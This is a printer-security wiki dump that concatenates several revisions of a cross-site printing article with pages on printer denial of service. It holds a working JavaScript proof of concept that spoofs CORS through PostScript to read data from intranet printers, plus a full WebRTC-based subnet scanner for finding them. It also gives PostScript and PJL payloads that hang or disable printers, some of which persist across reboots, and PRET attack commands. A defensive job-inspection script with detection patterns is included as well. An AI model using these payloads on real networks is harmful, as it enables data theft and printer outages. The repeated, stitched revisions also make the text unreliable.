Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. 
Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. ---- f8e030c1a1e9746e660af5cd948242d2d1ca7700 251 230 2017-01-28T14:20:37Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. 
[[File:XSP-deployment-channel.png|500px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. 
A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. 
Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. 
Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. 
Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. ---- a904296ae8135a9c9f4c1e5acbd5212150c0f23a 230 229 2017-01-24T18:53:17Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. 
== Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. 
A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. 
If the printer supports plain text printing, the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript – which makes it hard for an attacker to stay silent. This is unavoidable: we only gain control over the printer (and can, under some circumstances, disable printing functionality) once the HTTP body is processed, by which time the HTTP header has already been interpreted as plain text by the device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]], using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all of these protocols could successfully be used to deploy print jobs in our tests, using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref>, they have some drawbacks beyond not providing feedback through spoofed CORS headers:

* Cross-protocol access to the LPD and FTP ports is blocked by various web browsers
* Parameters for direct printing over the embedded web server are model-specific
* The IPP standard requires the <code>Content-Type</code> of HTTP POST requests to be set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref>, which an XHR object cannot do without triggering a CORS preflight request that the printer will not answer (<code>application/ipp</code> is not a CORS-safelisted content type) – it is however up to the implementation to actually care about incorrect types

A comparison of cross-site printing channels is given below:

{| class="wikitable" style="text-align:center"
|+ Comparison of cross-site printing channels
|-
! Method !! No feedback !! Unsolicited printouts !! Standardized !! Blocked by
|-
| Raw || || ✔ || ✔ ||
|-
| Web || ✔ || || ||
|-
| IPP || ✔ || || ✔ ||
|-
| LPD || ✔ || || ✔ || FF, Ch, Op
|-
| FTP || ✔ || || ✔ || FF, Ch, Op, IE
|}

One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', A. Bergkvist, D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref>, which is implemented in most modern browsers and is able to enumerate the IP addresses of local network interfaces. Given the local IP address, XHR objects are used to open connections to port 9100/tcp on all 253 remaining addresses of the /24 subnet and to retrieve the printer product name using PostScript and CORS spoofing, which only took seconds in our tests. If the printer is on the same subnet as the victim's host, its address can thus be detected solely using JavaScript. At the time of writing, WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we fall back to an informed brute-force approach: we try to connect to port 80 of the victim's router using XHR objects, based on a list of 115 default router addresses compiled from various internet-accessible resources. If a router is accessible, we scan its subnet for printers as described before.
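The discovery step above, as an added example that is not code from the original page or from the hacking-printers proof-of-concept: the ICE-candidate parsing reproduces the WebRTC address leak as it worked in the browsers of the time (current browsers publish mDNS names instead of host addresses, which the parser reports as null, so this part no longer works there), the /24 enumeration yields the 253 candidate addresses, and a bounded-concurrency scanner runs a probe over them. <code>xhrProbe</code> needs a browser and a CORS-spoofing job string such as the one from the previous section; the probe passed to <code>scanForPrinters</code> is injectable so the scan can be exercised offline, and all addresses and product names used for that are made up.

```javascript
// Added example, not from the original page: locate printers on the
// victim's /24 from the browser. ipFromCandidate() implements the WebRTC
// address leak as it worked in 2017-era browsers; current browsers hand out
// mDNS names instead of host IPs, which it reports as null. The probe is
// injected so the scanner can be exercised offline with a fake probe.

function ipFromCandidate(candidate) {
  // ICE candidate: "candidate:<foundation> <component> <proto> <prio> <addr> <port> typ host ..."
  const m = /^candidate:\S+ \d+ \S+ \d+ (\S+) \d+ typ host/.exec(candidate);
  if (!m) return null;                                          // not a host candidate
  return /^(\d{1,3}\.){3}\d{1,3}$/.test(m[1]) ? m[1] : null;   // "<uuid>.local" => null
}

function localIpViaWebRtc(callback) {
  // Browser only: a throwaway data channel makes the browser gather host candidates.
  const pc = new RTCPeerConnection({ iceServers: [] });
  pc.createDataChannel("");
  pc.onicecandidate = function (e) {
    const ip = e.candidate && ipFromCandidate(e.candidate.candidate);
    if (ip) { pc.close(); callback(ip); }
  };
  pc.createOffer().then(function (offer) { return pc.setLocalDescription(offer); });
}

function subnetHosts(localIp) {
  // The 253 other host addresses of the /24 (network and broadcast excluded).
  const o = localIp.split(".").map(Number);
  const hosts = [];
  for (let h = 1; h <= 254; h++) {
    if (h !== o[3]) hosts.push(o[0] + "." + o[1] + "." + o[2] + "." + h);
  }
  return hosts;
}

function xhrProbe(job, timeoutMs) {
  // Browser implementation of probe(host): POST the CORS-spoofing job and
  // resolve to the product name the printer echoed, or null.
  return function (host) {
    return new Promise(function (resolve) {
      const x = new XMLHttpRequest();
      x.open("POST", "http://" + host + ":9100");
      x.timeout = timeoutMs;
      x.onload = function () { resolve(x.status === 200 ? x.responseText.trim() : null); };
      x.onerror = x.ontimeout = function () { resolve(null); };
      x.send(job);
    });
  };
}

async function scanForPrinters(localIp, probe, concurrency) {
  // Runs probe(host) over the whole /24 with a bounded number of in-flight
  // requests and returns { host: product } for every responder.
  const queue = subnetHosts(localIp);
  const found = {};
  async function worker() {
    while (queue.length > 0) {
      const host = queue.shift();
      const product = await probe(host);
      if (product) found[host] = product;
    }
  }
  const workers = [];
  for (let i = 0; i < (concurrency || 32); i++) workers.push(worker());
  await Promise.all(workers);
  return found;
}
```

In a browser the pieces chain as <code>localIpViaWebRtc(ip => scanForPrinters(ip, xhrProbe(job, 1500)).then(console.log))</code>; the concurrency cap matters because browsers limit the number of simultaneous connections per host and a few hundred pending XHRs otherwise stall the whole page.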
== Proof-of-concept ==

A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it routes connections to all addresses – including local ones – through the Tor network, meaning XSP requests never reach the intranet printer.

----
= Denial of service =
''Revision of 2017-01-31T15:35:12Z by Admin''

''' ''Rule of thumb: ‘If you can print, you can prevent others from printing’'' '''

Any network resource can be slowed down or even made completely unavailable to legitimate users by consuming its resources in terms of CPU/memory or bandwidth. Common techniques involve stressing services (for example, web servers and applications) or protocols on the network level (for example, [https://en.wikipedia.org/wiki/SYN_flood SYN flooding] or more advanced [https://en.wikipedia.org/wiki/Slowloris_%28computer_security%29 Slowloris] attacks). While those generic attacks work against network printers too, this wiki focuses on printer-specific denial of service attacks: it gives a brief overview of methods to cause loss of availability and shows that this can be accomplished by very simple means. While the business impact of unavailable printers might be limited in most offices, time-critical industries like overnight digital printing companies may suffer '''financial loss''' even from short-term outages.

<!-- ''' ''Captain Obvious says: ‘Just send many documents with highest priority’'' '''

A trivial but effective way to keep a printing device busy is to send a large number of documents.
If the print spooler receives more jobs than it can process, the queue fills up, suspending print jobs from legitimate users. Such unsolicited print jobs are preferably set to the highest priority if the printing protocol allows prioritization. This simple attack works because print spoolers are usually designed as ''FIFO'' queues instead of using a more ‘fair’ or balanced algorithm to protect against power users. -->

''Currently, the following denial of service techniques are discussed in this wiki:''

* [[Transmission channel]] – Blocking others by keeping a connection to port 9100/tcp open
* [[Document processing]] – Using PostScript and PJL to break printing functionality
* [[Physical damage]] – Exhausting the NVRAM's limited number of write cycles
= Document processing =
''Revision of 2017-02-08T16:43:44Z by Admin''

Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] can be used to upload permanent macros or fonts until the available memory is consumed.
[[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed.

== PostScript ==

=== Infinite loops ===

One trivial example of an infinite loop written in PostScript is given below:

<syntaxhighlight lang=postscript>
%!
{} loop    % execute the empty procedure forever
</syntaxhighlight>

This minimalist document keeps a PostScript interpreter busy forever. In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. In most cases the malicious print job could be canceled manually from the control panel, while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent. Another variant of this attack is to write the code into ''Sys/Start'' or similar files which are executed at interpreter startup and therefore even '''survive a reboot''' on devices with a [[File system access|writable disk]].

'''How to test for this attack?'''

Use [[PRET]]'s ''hang'' command in ''ps'' mode:

 ./pret.py -q printer ps
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> hang
 Warning: This command causes an infinite loop rendering the device useless until manual restart. Press CTRL+C to abort.
 Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

=== Redefine showpage ===

Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]].
By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are still processed but no longer put to paper. Example code is given below:

<syntaxhighlight lang=postscript>
true 0 startjob     % leave the job server loop (password 0) so the change outlives this job
/showpage {} def    % showpage now does nothing, so no page is ever printed
</syntaxhighlight>

Again, this code can also be written into ''Sys/Start'', ''startup.ps'' or similar files to cause '''permanent DoS''' on devices with a [[File system access|writable disk]].

'''How to test for this attack?'''

Use [[PRET]]'s ''disable'' command in ''ps'' mode:

 ./pret.py -q printer ps
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> disable
 Disabling printing functionality

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PJL ==

=== PJL jobmedia ===

Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to put older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below:

 @PJL SET SERVICEMODE=HPBOISEID
 @PJL DEFAULT JOBMEDIA=OFF

'''How to test for this attack?'''

Use [[PRET]]'s ''disable'' command in ''pjl'' mode:

 ./pret.py -q printer pjl
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> disable
 Printing functionality: OFF

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

=== Offline mode ===

In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’<ref>''Printer Job Language Technical Reference Manual'', Hewlett-Packard, 1997</ref>.
This can be used to simulate a paper jam as shown below:

 @PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS"

The command is supported by various printer models of different manufacturers. The device can however easily be brought to accept jobs again by manually pressing the ''online'' button on the control panel.

'''How to test for this attack?'''

Use [[PRET]]'s ''offline'' command in ''pjl'' mode:

 ./pret.py -q printer pjl
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> offline "MESSAGE TO DISPLAY"
 Warning: Taking the printer offline will prevent yourself and others from printing or re-connecting to the device. Press CTRL+C to abort.
 Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----
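The payloads in this article are short and easy to recognise on the wire. As an added example, not code from the original page or from PRET, here is a small print-job inspector of the kind a print server or a 9100/tcp proxy could run before forwarding a job: it splits the job at the UEL, follows the language switch made by <code>@PJL ENTER LANGUAGE</code>, and matches the PostScript and PJL constructs shown above (infinite loop, <code>showpage</code> redefinition, <code>startjob</code>, service mode, <code>JOBMEDIA=OFF</code>, <code>OPMSG</code>). The rule set and the sample jobs are constructed for the example; a real filter would also have to deal with jobs lacking UEL framing and with compressed or binary PostScript.

```javascript
// Added example, not from the original page: flag print jobs that carry the
// denial-of-service payloads described in this article. The rules and the
// sample jobs below are constructed for the example.
const UEL = "\x1B%-12345X";

const RULES = [
  { id: "ps-infinite-loop",      lang: "ps",  re: /\{\s*\}\s*loop\b/ },
  { id: "ps-showpage-redefined", lang: "ps",  re: /\/showpage\s*\{[^}]*\}\s*def\b/ },
  { id: "ps-startjob",           lang: "ps",  re: /\b(startjob|exitserver)\b/ },  // makes changes persistent
  { id: "pjl-servicemode",       lang: "pjl", re: /^@PJL\s+SET\s+SERVICEMODE=/im },
  { id: "pjl-jobmedia-off",      lang: "pjl", re: /^@PJL\s+DEFAULT\s+JOBMEDIA=OFF\b/im },
  { id: "pjl-opmsg",             lang: "pjl", re: /^@PJL\s+OPMSG\b/im },
];

function segments(job) {
  // Split at the UEL and label each piece by language. A PJL segment that
  // contains "@PJL ENTER LANGUAGE=..." is cut there: what follows is the
  // named language, not PJL.
  const out = [];
  for (const raw of job.split(UEL)) {
    if (raw.trim() === "") continue;
    if (/^\s*@PJL/.test(raw)) {
      const m = /^@PJL\s+ENTER\s+LANGUAGE\s*=\s*(\w+)\s*$/im.exec(raw);
      if (m) {
        const cut = m.index + m[0].length;
        out.push({ lang: "pjl", text: raw.slice(0, cut) });
        const name = m[1].toLowerCase();
        out.push({ lang: name === "postscript" ? "ps" : name, text: raw.slice(cut) });
      } else {
        out.push({ lang: "pjl", text: raw });
      }
    } else if (/^\s*%!/.test(raw)) {
      out.push({ lang: "ps", text: raw });
    } else {
      out.push({ lang: "unknown", text: raw });
    }
  }
  return out;
}

function inspectJob(job) {
  // Every rule whose language matches the segment is tried; any hit blocks the job.
  const findings = [];
  for (const seg of segments(job)) {
    for (const rule of RULES) {
      if (rule.lang === seg.lang && rule.re.test(seg.text)) findings.push(rule.id);
    }
  }
  return { findings, verdict: findings.length > 0 ? "block" : "allow" };
}

// Constructed sample jobs, built from the snippets in this article.
const SAMPLE_HANG     = UEL + "%!\r\n{} loop\r\n" + UEL;
const SAMPLE_DISABLE  = UEL + "@PJL ENTER LANGUAGE=POSTSCRIPT\r\n%!\r\ntrue 0 startjob\r\n/showpage {} def\r\n" + UEL;
const SAMPLE_JOBMEDIA = UEL + "@PJL SET SERVICEMODE=HPBOISEID\r\n@PJL DEFAULT JOBMEDIA=OFF\r\n" + UEL;
const SAMPLE_OPMSG    = UEL + "@PJL OPMSG DISPLAY=\"PAPER JAM IN ALL DOORS\"\r\n" + UEL;
const SAMPLE_BENIGN   = UEL + "@PJL JOB\r\n@PJL ENTER LANGUAGE=POSTSCRIPT\r\n%!\r\n" +
  "/Helvetica findfont 12 scalefont setfont\r\n72 72 moveto (Hello) show\r\nshowpage\r\n" +
  UEL + "@PJL EOJ\r\n" + UEL;

if (typeof require !== "undefined" && require.main === module) {
  const samples = { SAMPLE_HANG, SAMPLE_DISABLE, SAMPLE_JOBMEDIA, SAMPLE_OPMSG, SAMPLE_BENIGN };
  for (const [name, job] of Object.entries(samples)) console.log(name, inspectJob(job));
}
```

Running it with <code>node</code> prints one verdict per sample; the benign job passes even though it contains <code>showpage</code>, because only a redefinition of the operator is matched, not its use.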
In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel, while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent. '''How to test for this attack?''' Use [[PRET]]'s ''hang'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hang Warning: This command causes an infinite loop rendering the device useless until manual restart. Press CTRL+C to abort. Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Redefine showpage === Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]]. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below: <syntaxhighlight lang=postscript> true 0 startjob /showpage {} def </syntaxhighlight> '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Disabling printing functionality '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
